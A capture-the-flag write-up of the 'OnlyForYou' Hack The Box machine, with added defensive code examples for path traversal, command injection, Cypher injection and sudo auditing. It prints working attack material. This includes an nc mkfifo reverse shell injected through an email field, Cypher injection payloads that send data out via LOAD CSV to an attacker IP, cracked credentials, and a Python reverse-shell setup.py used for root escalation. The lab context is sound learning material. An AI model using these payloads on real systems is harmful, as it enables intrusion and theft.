OnlyForYou HTB Write Up

Mario Rufisanto
MII Cyber Security Consulting Services
8 min read · Mar 25, 2024

Scanning

To start with, let’s scan the open ports using nmap.

We found two open ports, 22 and 80, which are the usual ones: 22 for SSH and 80 for the HTTP web server.

User Flag

Add the domain to /etc/hosts so we can open the web view from our browser.

And here is the web view of only4you.htb.

The page itself is only a landing page with no interesting features other than the contact us form. But by checking the page source, we can find a subdomain, http://beta.only4you.com, that we can visit.

Add the domain to /etc/hosts, then visit the web page.

The beta web page offers features to convert and resize image files, and it also gives us the option to download the source code. So let's download it and check out the functions that control those features.

In the source code, we can find the download function. It reads the image name from the request body and then checks it for LFI (path traversal) patterns. But the validation is weak: it can be bypassed by naming the file /{file-name}, since the path is then resolved from the root directory instead of the upload directory.
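To make the bug class concrete, here is an added illustration (not the beta app's real code): a weak check that only rejects ".." next to a hardened resolver that anchors every name under the upload directory. The upload root and function names are assumptions.

```python
import os
from typing import Optional

# Added illustration, not the beta app's code: the upload root and the
# function names are assumptions.
BASE_DIR = "/var/www/only4you.htb/beta/uploads"  # assumed upload directory


def resolve_weak(filename: str) -> Optional[str]:
    """Weak check in the spirit of the one described above.

    Rejecting '..' stops the obvious traversal, but os.path.join() throws
    BASE_DIR away as soon as `filename` is absolute, so "/etc/passwd"
    resolves to /etc/passwd itself.
    """
    if ".." in filename:
        return None
    return os.path.join(BASE_DIR, filename)


def resolve_hardened(filename: str) -> Optional[str]:
    """Resolve the name and require the result to stay inside BASE_DIR.

    Absolute names are refused outright; realpath() then collapses '.',
    '..' and symlinks, and the commonpath() test rejects anything that
    still ended up outside the upload directory.
    """
    if not filename or "\x00" in filename or os.path.isabs(filename):
        return None
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, filename))
    if candidate == base:
        return None  # the directory itself is not a downloadable file
    if os.path.commonpath([base, candidate]) != base:
        return None  # escaped via '..' segments
    return candidate


if __name__ == "__main__":
    for name in ("cat.png", "images/cat.png", "../../etc/passwd", "/etc/passwd"):
        print(f"{name!r:24} weak={resolve_weak(name)!s:40} hardened={resolve_hardened(name)}")
```

The hardened version deliberately decides on the resolved path rather than on the raw string, which is why an absolute name and a `..` chain are both caught by the same `commonpath` test.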

Here’s some of the files that I found:

/etc/passwd

The first file I checked was /etc/passwd, which shows that there are two users, john and dev.

/etc/nginx/nginx.conf

Then, since the website is hosted with nginx, I tried fetching several default nginx configuration files.

/etc/nginx/sites-available/default

This file shows the two domains deployed on the web server and their web directories.

With the web directory paths known, we can try to enumerate some likely file names.

/var/www/only4you.htb/app.py

The file app.py is one of the most common files in a Python Flask project. In it, the index function handles the contact us form. We can see that it imports a sendmessage method from form, which means we can try to download form.py as well.

/var/www/only4you.htb/form.py

In this file there is an interesting line that calls the run() method. It takes the domain part of the email from the request body and puts it directly into the command parameter.

This is a command injection vulnerability that we can exploit to spawn a foothold reverse shell. By sending a dummy request from the page, we can open the request in Burp Repeater, customise the body and try several payloads until one works.
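The fix for this bug class is to stop treating the domain as shell text. Below is an added example (not form.py itself) that shows the vulnerable construction next to a hardened one: the domain is validated against a hostname grammar and passed as a single argv element without a shell. The `dig txt` lookup and the function names are assumptions.

```python
import re
import subprocess
from typing import List

# Added illustration of the bug class, not form.py: the DNS lookup command
# and the function names are assumptions.

# Hostname grammar: dot-separated labels of letters, digits and hyphens.
# Shell metacharacters such as ';', '|' or '$' cannot satisfy it.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def build_vulnerable_command(email: str) -> str:
    """Vulnerable pattern: whatever follows '@' is spliced into a shell
    string. Under shell=True, "a@b.com; <cmd>" runs <cmd> as a second
    command. The string is returned here rather than executed."""
    domain = email.split("@")[1]
    return f"dig txt {domain}"


def extract_domain(email: str) -> str:
    """Check the address shape and return the domain, or raise ValueError."""
    local, sep, domain = email.rpartition("@")
    if not sep or not local or not DOMAIN_RE.fullmatch(domain):
        raise ValueError("invalid email address")
    return domain


def is_safe_email(email: str) -> bool:
    try:
        extract_domain(email)
        return True
    except ValueError:
        return False


def build_safe_command(email: str) -> List[str]:
    """Safe pattern: the validated domain is one argv element, no shell."""
    return ["dig", "txt", extract_domain(email)]


def lookup_txt(email: str) -> str:
    """Run the lookup without a shell; metacharacters in the argument are
    just bytes of a hostname as far as dig is concerned."""
    result = subprocess.run(
        build_safe_command(email),
        shell=False, capture_output=True, text=True, timeout=10, check=False,
    )
    return result.stdout


if __name__ == "__main__":
    sample = "asd@mail.com; echo injected"  # constructed, benign stand-in for a payload
    print("vulnerable:", build_vulnerable_command(sample))
    print("safe accepts it:", is_safe_email(sample))
    print("safe argv:", build_safe_command("asd@mail.com"))
```

Two layers matter here: the allow-list regex rejects the injection up front, and the argv form means that even a validation slip would not hand the string to a shell.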

I used a payload generated with https://www.revshells.com/ (nc mkfifo) and appended it to the email.

asd@mail.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.12 3000 >/tmp/f

Then URL-encode the email and send the request.

Remember to start a netcat listener beforehand.

With the reverse shell we got, we can traverse the filesystem and check out the directories. But since this is not a user shell yet, we need to do a horizontal pivot, and for that we need to gather some information we can use, such as checking the running services.

After looking around the services, the interesting one was on port 8001. Since we cannot access it directly, we need to forward port 8001 to the attacking machine, and for that we can use chisel.

https://github.com/jpillora/chisel

Since the box is not directly connected to the internet, we need to serve an HTTP server from our machine and download chisel from there. So find a directory we have write access to, such as /tmp, and put the file there.

# on the target (client): forward the target's 127.0.0.1:8001 back to the attacker
./chisel_linux client [ATTACKER_IP]:9999 R:8001:127.0.0.1:8001

# on the attacking machine (server, reverse mode)
chisel server --reverse -p 9999

With chisel in place, we can now check out what port 8001 is serving. But first we need credentials to access it. This looked like a rabbit hole, since it doesn't have any of the vulnerabilities we might expect; the answer is actually really simple: a weak credential.

Username: admin
Password: admin

Then, after we successfully log in, we find an employee list with a search feature. From the services we saw while gathering information, there is a Neo4j service that probably serves as the database behind this application.

So I tried some Cypher injection payloads, and here are the results.

https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j

# Server version
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.12:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
# Get labels
' OR 1=1 WITH 1 as a CALL db.labels() YIELD label LOAD CSV FROM 'http://10.10.14.12:8000/?label=' + label AS r RETURN 0 as _0 //
# List the property keys and values of the nodes labelled "user"
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.12:8000/?' + p + '=' + toString(f[p]) as l RETURN 0 as _0 //
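All three payloads work because the search term is concatenated into the Cypher text, so a quote closes the literal and the rest becomes query. The added example below (not the employee app's code) shows the concatenated query next to its parameterised form, and a small detector that flags the indicator shapes used above (quote-and-tautology, `CALL dbms./db.`, `LOAD CSV FROM`, trailing `//`) in constructed JSON-lines application logs. The `employee` label, the query shape and the log format are assumptions.

```python
import json
import re
from typing import Dict, List, Tuple

# Added illustration, not the employee-search app's code: the `employee`
# label, the query shape and the log format are assumptions.


def build_search_vulnerable(term: str) -> str:
    """String concatenation: a quote in `term` ends the literal and the
    remainder is parsed as Cypher, which is what the payloads above use."""
    return f"MATCH (e:employee) WHERE e.name CONTAINS '{term}' RETURN e.name"


def build_search_safe(term: str) -> Tuple[str, Dict[str, str]]:
    """Parameterised query: the driver ships `term` as data, never as query
    text, so quotes and keywords inside it have no syntactic effect."""
    return (
        "MATCH (e:employee) WHERE e.name CONTAINS $term RETURN e.name",
        {"term": term},
    )


# Indicator patterns drawn from the payload shapes shown above.
INDICATORS = [
    ("comment_terminator", re.compile(r"//")),
    ("tautology", re.compile(r"\bOR\s+1\s*=\s*1\b", re.IGNORECASE)),
    ("procedure_call", re.compile(r"\bCALL\s+(?:dbms|db)\.", re.IGNORECASE)),
    ("load_csv_exfil", re.compile(r"\bLOAD\s+CSV\s+FROM\b", re.IGNORECASE)),
]


def scan_search_term(term: str) -> List[str]:
    """Names of the indicators that fire on one search term."""
    return [name for name, rx in INDICATORS if rx.search(term)]


# Constructed JSON-lines application log; not captured from the box.
SAMPLE_LOG = [
    json.dumps({"ts": "2023-04-28T21:03:09Z", "user": "admin", "search": "john"}),
    json.dumps({"ts": "2023-04-28T21:03:10Z", "user": "admin", "search": "O'Brien"}),
    json.dumps({
        "ts": "2023-04-28T21:03:11Z",
        "user": "admin",
        "search": "' OR 1=1 WITH 1 as a CALL db.labels() YIELD label "
                  "LOAD CSV FROM 'http://10.10.14.12:8000/?label=' + label "
                  "AS r RETURN 0 as _0 //",
    }),
]


def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(timestamp, user, indicators) for every search that trips an indicator."""
    flagged = []
    for line in lines:
        rec = json.loads(line)
        hits = scan_search_term(rec.get("search", ""))
        if hits:
            flagged.append((rec["ts"], rec["user"], hits))
    return flagged


if __name__ == "__main__":
    print(build_search_vulnerable("O'Brien"))   # the apostrophe breaks the literal
    print(build_search_safe("O'Brien"))         # the apostrophe is just data
    for ts, user, hits in scan_log(SAMPLE_LOG):
        print(ts, user, hits)
```

Note that a legitimate name such as O'Brien breaks the concatenated query but is harmless in the parameterised one, and the detector does not flag it: the indicators key on Cypher keywords, not on quotes alone, which keeps the false-positive rate down on real search traffic.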

Now we have two user credentials with the passwords still hashed, so we can use https://crackstation.net/ to try cracking them.

password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6
10.10.11.210 - - [28/Apr/2023 21:03:09] "GET /?username=john HTTP/1.1" 200 -
password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
10.10.11.210 - - [28/Apr/2023 21:03:09] "GET /?username=admin HTTP/1.1" 200 -
Username: john
Password: ThisIs4You

Username: admin
Password: admin

Recall that we found the user john earlier; now we can try connecting over SSH with john's credentials.

After a successful attempt, we can find the user flag in john’s home directory.

Root Flag

First, we need to gather some information about which commands we can run with sudo. With sudo -l, we found that we can use pip3 to download any .tar.gz file from the service deployed on port 3000.

So, to investigate further, we need to forward port 3000 to our attacking machine. The steps are the same as for port 8001.

After we open port 3000 in the browser, we find that it serves a Gogs instance. With that in mind, since we can download a .tar.gz file from the repositories, we can use that to our advantage and create a setup.py file with a reverse shell payload inside; pip will run it automatically when downloading the file.
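From the defender's side, the sudo rule is the root cause: it hands root to a tool that executes code from what it fetches (pip runs a source distribution's setup.py during download) and it leaves a wildcard in the argument. The added example below (not a tool from the page) parses `sudo -l` style output and flags rules with those properties. The sample output is constructed to match the finding described above and is not the box's real rule; the rule names and the binary list are assumptions.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed `sudo -l` output in the shape of the finding described above;
# an illustration, not the box's real rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for john on only4you:
    env_reset, mail_badpass

User john may run the following commands on only4you:
    (root) NOPASSWD: /usr/bin/pip3 download http\\://127.0.0.1\\:3000/*.tar.gz
    (root) /usr/bin/systemctl restart nginx
"""

# Binaries that execute code taken from their arguments or from what they
# fetch; pip, for one, runs a source distribution's setup.py on download.
CODE_RUNNERS = {"pip", "pip2", "pip3", "python", "python2", "python3",
                "npm", "gem", "perl", "ruby"}

# "(runas) TAG: TAG: /path/to/cmd args" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_rules(text: str) -> List[Dict[str, str]]:
    """Extract the command rules; Defaults and header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"].strip(),
                          "tags": m["tags"].strip(),
                          "cmd": m["cmd"].strip()})
    return rules


def assess_rule(rule: Dict[str, str]) -> List[str]:
    """Findings for one rule, in a fixed order so reports are stable."""
    findings = []
    binary = os.path.basename(rule["cmd"].split()[0])
    if binary in CODE_RUNNERS:
        findings.append("runs_code_from_input")
    if "*" in rule["cmd"]:
        findings.append("wildcard_argument")
    if "NOPASSWD" in rule["tags"]:
        findings.append("no_password")
    return findings


def audit(text: str) -> List[Tuple[str, List[str]]]:
    """(command, findings) for every rule that has at least one finding."""
    report = []
    for rule in parse_rules(text):
        findings = assess_rule(rule)
        if findings:
            report.append((rule["cmd"], findings))
    return report


if __name__ == "__main__":
    for cmd, findings in audit(SAMPLE_SUDO_L):
        print(f"{cmd}\n    {', '.join(findings)}")
```

The systemctl rule in the sample produces no findings, which is the point of the comparison: a fixed command with fixed arguments is a very different exposure from an interpreter or package manager with a wildcard.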

But first, to access the repository, we need to sign in. Luckily john's credentials still work here.

So now, create a setup.py file with a reverse shell payload such as the one below and put it inside a folder. Then pack the folder as a .tar.gz and upload it to the repository.

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

There is an important setting we need to change to make it possible to download the file from the repository: set the visibility to public. There is also some kind of cron job running in the background that automatically resets any changes made in the repository, so keep that in mind.

After that, all we need to do is download the raw file of the payload we created before.

Remember to start the netcat beforehand to catch the reverse shell. The root flag will be in the root directory.
